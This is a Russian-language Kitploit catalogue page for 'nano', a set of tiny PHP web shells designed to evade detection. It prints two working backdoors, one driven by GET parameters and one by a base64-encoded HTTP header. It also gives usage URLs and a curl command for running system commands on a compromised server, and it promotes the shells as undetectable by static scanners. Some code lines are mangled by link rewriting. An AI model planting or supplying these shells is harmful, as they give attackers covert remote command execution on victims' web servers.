Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
nano — Nano — это семейство PHP-веб-шеллов, оптимизированных в стиле код-гольфа для скрытности. | Kitploit
Инструменты/GitHubGitHub/s0md3v/nano
Генерация полезной нагрузкиШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubs0md3v/nano

nano

Nano — это семейство PHP-веб-шеллов, оптимизированных в стиле код-гольфа для скрытности.

Репозиторий
449916 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

nano

Nano — это семейство PHP-вебшеллов, код которых минимизирован в стиле code golf для максимальной скрытности и эффективности.
Возможно, стоит подписаться на обновления — я продолжу добавлять сюда новые вебшеллы.

Nano

root@kitploit:~
<?=$_GET[p]==_&&$_GET[f](https://github.com/s0md3v/nano/blob/HEAD/$GET_%5Bc%5D);

Возможности

  • 35 байт
  • Не обнаруживается статическими сканерами кода
  • Поддерживает аутентификацию

Использование

http://example.com/nano.php?f=function&c=command&p=password

f — для функции
c — для команды
p — для пароля

Например, приведённый ниже код выполнит команду ls:

http://example.com/nano.php?f=system&c=ls&p=password

Ninja

root@kitploit:~
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0](https://github.com/s0md3v/nano/blob/HEAD/$x%5B1%5D);

Возможности

  • 93 байта
  • Полностью не обнаруживаемый

Использование

Этот немного сложнее.
Допустим, вы хотите выполнить system(ls). Запишите это как system~ls и затем закодируйте в base64, т.е. c3lzdGVtKGxzKQ==
Теперь добавьте в начало любой 1 символ. Например, 'x', тогда получится xc3lzdGVtKGxzKQ==
Теперь откройте терминал и введите следующую команду
curl -H 'x: xc3lzdGVtKGxzKQ==' http://example.com/backdoored.php
Слишком много работы? Вместо этого можно использовать handler.

handler

Прочее

Это моя первая PHP-штуковина, так что если есть способ сделать то, что я сделал, лучше, пожалуйста, дайте мне знать или откройте pull request.
Проект nano лицензирован под лицензией MIT, что по сути означает, что вы должны указывать моё авторство, если хотите распространять или изменять его.

Скачать инструмент